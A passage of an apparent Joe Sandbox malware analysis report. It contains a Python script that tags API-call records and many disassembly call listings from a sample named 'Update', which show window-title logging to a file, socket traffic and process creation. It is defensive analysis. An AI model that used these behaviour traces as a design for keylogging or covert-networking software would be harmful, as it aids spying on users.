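            level, opt = to_int(c["args"][1]), to_int(c["args"][2])
            if level == SOL_SOCKET and opt in SOCKOPT_NAMES:
                tags.append("setsockopt " + SOCKOPT_NAMES[opt])
        elif c["name"] == "WSASetLastError" and c["args"]:
            code = to_int(c["args"][0])
            label = WSA_ERRORS.get(code) or (hex(code) if code is not None else c["args"][0])
            tags.append("WSASetLastError " + label)  # unknown codes stay as raw hex
    return tags

# Constructed sample: call and String ID lines copied from records on this page.
SAMPLE = r"""APIs
• GetForegroundWindow.USER32(?,74DF23A0,00000000), ref: 034EE759
• GetWindowTextW.USER32(00000000,035116F0,00000800), ref: 034EE76F
• GetLocalTime.KERNEL32(?,?,?,?,?,74DF23A0,00000000), ref: 034EE7BD
• wsprintfW.USER32 ref: 034EE804
  • Part of subcall function 034EE6B0: CreateFileW.KERNEL32(03510D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 034EE6D7
  • Part of subcall function 034EE6B0: WriteFile.KERNEL32(00000000,?,00000000), ref: 034EE70A
APIs
• CreateProcessW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 034ECA31
• String ID: D$WinSta0\Default
APIs
• lstrcmpiW.KERNEL32(?,A:\), ref: 034E8166
• lstrcmpiW.KERNEL32(?,B:\), ref: 034E8176
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 034E81A6
APIs
• setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 034E359A
• setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 034E35B3
• WSASetLastError.WS2_32(0000000D), ref: 034E4F63
• WSASetLastError.WS2_32(00002746), ref: 034E4F8A
"""

if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        print(f"record {i}: {classify(rec)}")
```

Two details worth checking by hand against the records above rather than trusting the tags: the logger's GetWindowTextW writes into 035116F0 and the same address is passed to lstrlenW before GetLocalTime and wsprintfW, which is what ties the captured title to the timestamped line written by the callee at 034EE6B0; and the single-character String ID "D" in the CreateProcessW record is 0x44 = 68, the x86 sizeof(STARTUPINFO) stored in its cb field before the call, so it is an immediate that the plugin lists as a string rather than a real string constant.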
APIs
  • Part of subcall function 034E3660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 034E3667
  • Part of subcall function 034E3660: _free.LIBCMT ref: 034E369C
  • Part of subcall function 034E3660: _malloc.LIBCMT ref: 034E36D7
  • Part of subcall function 034E3660: _memset.LIBCMT ref: 034E36E5
• InterlockedIncrement.KERNEL32(03511F0C), ref: 034E3565
• InterlockedIncrement.KERNEL32(03511F0C), ref: 034E3573
• setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 034E359A
• setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 034E35B3
• ResetEvent.KERNEL32(?,?,?,03511F0C), ref: 034E35EE
• SetLastError.KERNEL32(00000000), ref: 034E3621
• GetLastError.KERNEL32 ref: 034E3639
  • Part of subcall function 034E3F60: GetCurrentThreadId.KERNEL32 ref: 034E3F65
  • Part of subcall function 034E3F60: send.WS2_32(?,035049C0,00000010,00000000), ref: 034E3FC6
  • Part of subcall function 034E3F60: SetEvent.KERNEL32(?), ref: 034E3FE9
  • Part of subcall function 034E3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 034E3FF5
  • Part of subcall function 034E3F60: WSACloseEvent.WS2_32(?), ref: 034E4003
  • Part of subcall function 034E3F60: shutdown.WS2_32(?,00000001), ref: 034E401B
  • Part of subcall function 034E3F60: closesocket.WS2_32(?), ref: 034E4025
• SetLastError.KERNEL32(00000000), ref: 034E3649
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
• String ID:
• API String ID: 127459856-0
APIs
• ResetEvent.KERNEL32(?), ref: 034E4443
• ResetEvent.KERNEL32(?), ref: 034E444C
• timeGetTime.WINMM ref: 034E444E
• InterlockedExchange.KERNEL32(?,00000000), ref: 034E445D
• WaitForSingleObject.KERNEL32(?,00001770), ref: 034E44AB
• ResetEvent.KERNEL32(?), ref: 034E44C8
  • Part of subcall function 034E3F60: GetCurrentThreadId.KERNEL32 ref: 034E3F65
  • Part of subcall function 034E3F60: send.WS2_32(?,035049C0,00000010,00000000), ref: 034E3FC6
  • Part of subcall function 034E3F60: SetEvent.KERNEL32(?), ref: 034E3FE9
  • Part of subcall function 034E3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 034E3FF5
  • Part of subcall function 034E3F60: WSACloseEvent.WS2_32(?), ref: 034E4003
  • Part of subcall function 034E3F60: shutdown.WS2_32(?,00000001), ref: 034E401B
  • Part of subcall function 034E3F60: closesocket.WS2_32(?), ref: 034E4025
• ResetEvent.KERNEL32(?), ref: 034E44DC
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
• String ID:
• API String ID: 542259498-0
APIs
• SetLastError.KERNEL32(0000139F,?), ref: 034E4E99
• TryEnterCriticalSection.KERNEL32(?,?), ref: 034E4EB8
• TryEnterCriticalSection.KERNEL32(?), ref: 034E4EC2
• SetLastError.KERNEL32(0000139F), ref: 034E4ED9
• LeaveCriticalSection.KERNEL32(?), ref: 034E4EE2
• LeaveCriticalSection.KERNEL32(?), ref: 034E4EE9
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterErrorLastLeave
• String ID:
• API String ID: 4082018349-0
APIs
• SetLastError.KERNEL32(0000007F), ref: 034EDD32
• SetLastError.KERNEL32(0000007F), ref: 034EDE35
Strings
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: ErrorLast
• String ID: Main
• API String ID: 1452528299-521822810
APIs
• FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,F1BBC535,QQ9l,6C39CD1F,QQ9l,?,00000000), ref: 6C39CCD1
Strings
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: FreeLibrary
• String ID: QQ9l$api-ms-$ext-ms-
• API String ID: 3664257935-1877487809
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 6C38CB70
• __alloca_probe_16.LIBCMT ref: 6C38CB9C
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 6C38CBDB
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C38CBF8
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 6C38CC37
• __alloca_probe_16.LIBCMT ref: 6C38CC54
• LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 6C38CC96
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6C38CCB9
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: ByteCharMultiStringWide$__alloca_probe_16
• String ID:
• API String ID: 2040435927-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 00913F3C
• SetLastError.KERNEL32(0000139F,?,10015054,0091361F), ref: 0091402B
  • Part of subcall function 00912B57: SwitchToThread.KERNEL32 ref: 00912B81
• send.WS2_32(?,10017440,00000010,00000000), ref: 00913F9D
• SetEvent.KERNEL32(?), ref: 00913FC0
• InterlockedExchange.KERNEL32(?,00000000), ref: 00913FCC
• WSACloseEvent.WS2_32(?), ref: 00913FDA
• shutdown.WS2_32(?,00000001), ref: 00913FF2
• closesocket.WS2_32(?), ref: 00913FFC
Memory Dump Source
• Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_910000_Update.jbxd
Similarity
• API ID: EventThread$CloseCurrentErrorExchangeInterlockedLastSwitchclosesocketsendshutdown
• String ID:
• API String ID: 518013673-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 034E3F65
• SetLastError.KERNEL32(0000139F,?,74DEDFA0,034E3648), ref: 034E4054
  • Part of subcall function 034E2BC0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 034E2BD6
  • Part of subcall function 034E2BC0: SwitchToThread.KERNEL32 ref: 034E2BEA
• send.WS2_32(?,035049C0,00000010,00000000), ref: 034E3FC6
• SetEvent.KERNEL32(?), ref: 034E3FE9
• InterlockedExchange.KERNEL32(?,00000000), ref: 034E3FF5
• WSACloseEvent.WS2_32(?), ref: 034E4003
• shutdown.WS2_32(?,00000001), ref: 034E401B
• closesocket.WS2_32(?), ref: 034E4025
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
• String ID:
• API String ID: 3254528666-0
APIs
• EnterCriticalSection.KERNEL32(?,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E4074
• ResetEvent.KERNEL32(?,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E4087
• ResetEvent.KERNEL32(?,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E4090
• ResetEvent.KERNEL32(?,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E4099
  • Part of subcall function 034E1350: HeapFree.KERNEL32(?,00000000,?,?,?,034E40A6,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E1390
  • Part of subcall function 034E1420: HeapFree.KERNEL32(?,00000000,?,?,?,034E40B1,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E143D
  • Part of subcall function 034E1420: _free.LIBCMT ref: 034E1459
• HeapDestroy.KERNEL32(?,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E40B9
• HeapCreate.KERNEL32(?,?,?,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E40D4
• SetEvent.KERNEL32(?,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E4150
• LeaveCriticalSection.KERNEL32(?,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E4157
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
• String ID:
• API String ID: 1219087420-0
                                                                                            • Opcode ID: 6625312a5e361be12c0099bf679cce66d789ae0ceed730746967bc2133aa47b9
                                                                                            • Instruction ID: 71aab08745a4651faeeb72d3624b208fc286f20c72254873fb26c4f93635e2d1
                                                                                            • Opcode Fuzzy Hash: 6625312a5e361be12c0099bf679cce66d789ae0ceed730746967bc2133aa47b9
                                                                                            • Instruction Fuzzy Hash: EA314975200A06AFD705EF75D848BA6F7A8FF48315F04865AE4298B360CB35B816DFD4
                                                                                            APIs
                                                                                            • _set_app_type.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000002), ref: 0002101E
                                                                                            • _set_fmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000002), ref: 00021029
                                                                                            • __p__commode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000002), ref: 00021035
                                                                                            • __RTC_Initialize.LIBCMT ref: 0002104D
                                                                                            • _configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,000217FA), ref: 00021062
                                                                                              • Part of subcall function 0002155C: InitializeSListHead.KERNEL32(000230C0,00021072), ref: 00021561
                                                                                            • __setusermatherr.API-MS-WIN-CRT-MATH-L1-1-0(Function_0000154F), ref: 00021080
                                                                                            • _configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000), ref: 0002109B
                                                                                            • _initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000210AA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3562466950.0000000000021000.00000020.00000001.01000000.00000005.sdmp, Offset: 00020000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3562433732.0000000000020000.00000002.00000001.01000000.00000005.sdmp
                                                                                             • Associated: 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmp
                                                                                             • Associated: 00000003.00000002.3562539425.0000000000023000.00000004.00000001.01000000.00000005.sdmp
                                                                                             • Associated: 00000003.00000002.3562581470.0000000000024000.00000002.00000001.01000000.00000005.sdmp
                                                                                             • Associated: 00000003.00000002.3562581470.0000000000066000.00000002.00000001.01000000.00000005.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_20000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize$HeadList__p__commode__setusermatherr_configthreadlocale_configure_narrow_argv_initialize_narrow_environment_set_app_type_set_fmode
                                                                                            • String ID:
                                                                                            • API String ID: 1933938900-0
                                                                                            • Opcode ID: 315d5551eba9dd7793f0969fdb3a04e9c8aa9acc4db933c303e7390013b78796
                                                                                            • Instruction ID: d557aff98991b80415d4b1814c092c83c48e5cfd8e882c8a0b8043079e12abb6
                                                                                            • Opcode Fuzzy Hash: 315d5551eba9dd7793f0969fdb3a04e9c8aa9acc4db933c303e7390013b78796
                                                                                            • Instruction Fuzzy Hash: 05019675A48FB1E4D9643BF93907ADE02AA0FF0794F6109D5F9069A083EEA5C5C140F3
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _memset$_malloc
                                                                                            • String ID: ($6$gfff$gfff
                                                                                            • API String ID: 3506388080-713438465
                                                                                            • Opcode ID: adc29c7617633d4b8d790a07087d8aa0c6b7af03618b52efd29b7f2ce1e6f169
                                                                                            • Instruction ID: 39367311531b9a9d59523056ce787cf4119cc556e98def142e3fd4cc5b3b5780
                                                                                            • Opcode Fuzzy Hash: adc29c7617633d4b8d790a07087d8aa0c6b7af03618b52efd29b7f2ce1e6f169
                                                                                            • Instruction Fuzzy Hash: 63D18DB1D02318EFDB10EFE5E885A9EBBB9FF88300F104529E905AB251D774A905CB91
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strrchr
                                                                                            • String ID:
                                                                                            • API String ID: 3213747228-0
                                                                                            • Opcode ID: a85807fc997ee618783a6036bf783e221dda6a75a837a72a657676350f801317
                                                                                            • Instruction ID: 363f8884845df0e20ecab6373eeadbdabafe8a1b33984ebe3495529204e59a69
                                                                                            • Opcode Fuzzy Hash: a85807fc997ee618783a6036bf783e221dda6a75a837a72a657676350f801317
                                                                                            • Instruction Fuzzy Hash: 41B14232A05355AFEB018F68CC81BAEBBA5FF56318F184165E844AB781F3759901CFE1
                                                                                            APIs
                                                                                              • Part of subcall function 034E1610: __vswprintf.LIBCMT ref: 034E1646
                                                                                            • _malloc.LIBCMT ref: 034E2330
                                                                                              • Part of subcall function 034EF673: __FF_MSGBANNER.LIBCMT ref: 034EF68C
                                                                                              • Part of subcall function 034EF673: __NMSG_WRITE.LIBCMT ref: 034EF693
                                                                                              • Part of subcall function 034EF673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76), ref: 034EF6B8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap__vswprintf_malloc
                                                                                            • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                            • API String ID: 3723585974-868042568
                                                                                            • Opcode ID: f7bdc68a8e16a89a065ec2a791f2a237585212d2137bc45b74cd742977cbfd10
                                                                                            • Instruction ID: e6d213780f1cd410ec51aab4a14b3cd2f8f8ccd1d4fd3bbcf7af690f61fd4db1
                                                                                            • Opcode Fuzzy Hash: f7bdc68a8e16a89a065ec2a791f2a237585212d2137bc45b74cd742977cbfd10
                                                                                            • Instruction Fuzzy Hash: 6BB1B475A002058FCF18EF69D880AAEB7A9BF44311F0849AFDD199F346D7B1D941CB98
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 034E1878
                                                                                            • _free.LIBCMT ref: 034E18B6
                                                                                            • _free.LIBCMT ref: 034E18F5
                                                                                            • _free.LIBCMT ref: 034E1935
                                                                                            • _free.LIBCMT ref: 034E195D
                                                                                            • _free.LIBCMT ref: 034E1981
                                                                                            • _free.LIBCMT ref: 034E19B9
                                                                                              • Part of subcall function 034EF639: RtlFreeHeap.NTDLL(00000000,00000000,?,034F3E4C,00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76), ref: 034EF64F
                                                                                              • Part of subcall function 034EF639: GetLastError.KERNEL32(00000000,?,034F3E4C,00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76,00000000), ref: 034EF661
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 7affac38314d1018a79a6e4f9d4366216815eb94c66f538062d4506e23fe757e
                                                                                            • Instruction ID: 831e2e4883b1aadc5bdbe1ffde13565b819ea0932a343e8a1e5290b727dac8cf
                                                                                            • Opcode Fuzzy Hash: 7affac38314d1018a79a6e4f9d4366216815eb94c66f538062d4506e23fe757e
                                                                                            • Instruction Fuzzy Hash: B8515FB6A40214CFC704DF59C18486AFBA6FF8921571A80AEC61A9F321D732BD47CF95
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 034E3883
                                                                                            • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 034E38C4
                                                                                            • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 034E3931
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 034E395C
                                                                                            • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 034E39F4
                                                                                            • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 034E3A22
                                                                                            • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 034E3A39
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                            • String ID:
                                                                                            • API String ID: 3058130114-0
                                                                                            • Opcode ID: 0821288a55dda2f11a9d214c66cc241af8e426856035b018f3824d7bd219d1ff
                                                                                            • Instruction ID: c13b48690828bce8d16a2d5d67dda6c8cdf0bc3812808861ed30478a42f8c985
                                                                                            • Opcode Fuzzy Hash: 0821288a55dda2f11a9d214c66cc241af8e426856035b018f3824d7bd219d1ff
                                                                                            • Instruction Fuzzy Hash: 95518B786007019BDB21DF29C984BABB7E8BF04716F14091FD95A9F380DB31E8418F49
                                                                                            APIs
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 6C38DA47
                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6C38DA4F
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 6C38DAD8
                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6C38DB03
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 6C38DB58
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                            • String ID: csm
                                                                                            • API String ID: 1170836740-1018135373
                                                                                            • Opcode ID: 4a8643310cbe7aca331218e893e1157da8d6fc8709d708c42ef2e275ab6ca902
                                                                                            • Instruction ID: 7cd83a8b2a993512349c012916b5e11332483edbcbbc427645e390f0b3ed529d
                                                                                            • Opcode Fuzzy Hash: 4a8643310cbe7aca331218e893e1157da8d6fc8709d708c42ef2e275ab6ca902
                                                                                            • Instruction Fuzzy Hash: B141B430E0221A9FCF00DF68C884A9E7BB5AF45718F208156E8559B751E73ADA15CF91
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(10015EB4,?,009175B9,10017B60,00000008,0091774D,?,?,?,10017B80,0000000C,00917808,?), ref: 00919AA5
                                                                                            • __mtterm.LIBCMT ref: 00919AB1
                                                                                              • Part of subcall function 0091977C: RtlDecodePointer.NTDLL(100191C8), ref: 0091978D
                                                                                              • Part of subcall function 0091977C: TlsFree.KERNEL32(100191CC,0091767C,00917662,10017B60,00000008,0091774D,?,?,?,10017B80,0000000C,00917808,?), ref: 009197A7
                                                                                            • TlsAlloc.KERNEL32(?,?,009175B9,10017B60,00000008,0091774D,?,?,?,10017B80,0000000C,00917808,?), ref: 00919B3E
                                                                                            • __init_pointers.LIBCMT ref: 00919B63
                                                                                            • __calloc_crt.LIBCMT ref: 00919BD1
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00919BFD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocCurrentDecodeFreeHandleModulePointerThread__calloc_crt__init_pointers__mtterm
                                                                                            • String ID:
                                                                                            • API String ID: 3766280069-0
                                                                                            • Opcode ID: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                                            • Instruction ID: 1106234cad8816fa5c5eae17883908e6c58ddc9a55068a9b40994a3fce3463aa
                                                                                            • Opcode Fuzzy Hash: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                                            • Instruction Fuzzy Hash: 32314D31A40E39EEE721AF749C987853EE6EB49361B188526E455D72B0FB31D4C1CF90
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,034EE815,?,?,?,?,74DF23A0,00000000), ref: 034EE6BD
                                                                                            • CreateFileW.KERNEL32(03510D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,034EE815,?,?,?,?,74DF23A0,00000000), ref: 034EE6D7
                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 034EE6F2
                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000), ref: 034EE6FF
                                                                                            • WriteFile.KERNEL32(00000000,?,00000000), ref: 034EE70A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 034EE711
                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 034EE71E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 4202892810-0
                                                                                            • Opcode ID: 658f561e0c063beca1fc3b88e6bc099c4c8351ec2563f907cd4ca6dbc9e5b6e0
                                                                                            • Instruction ID: 0833e641299037891f634c3d6ae6f693f616a8a9c2c1f5b5d44568ec952adbd3
                                                                                            • Opcode Fuzzy Hash: 658f561e0c063beca1fc3b88e6bc099c4c8351ec2563f907cd4ca6dbc9e5b6e0
                                                                                            • Instruction Fuzzy Hash: D501A471241210BBE22477A4EC0EF5A376CEB09B29F104644F725A61D4D6B1690AA765
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,03506318,00000008,034F3E36,00000000,00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C), ref: 034F3D3F
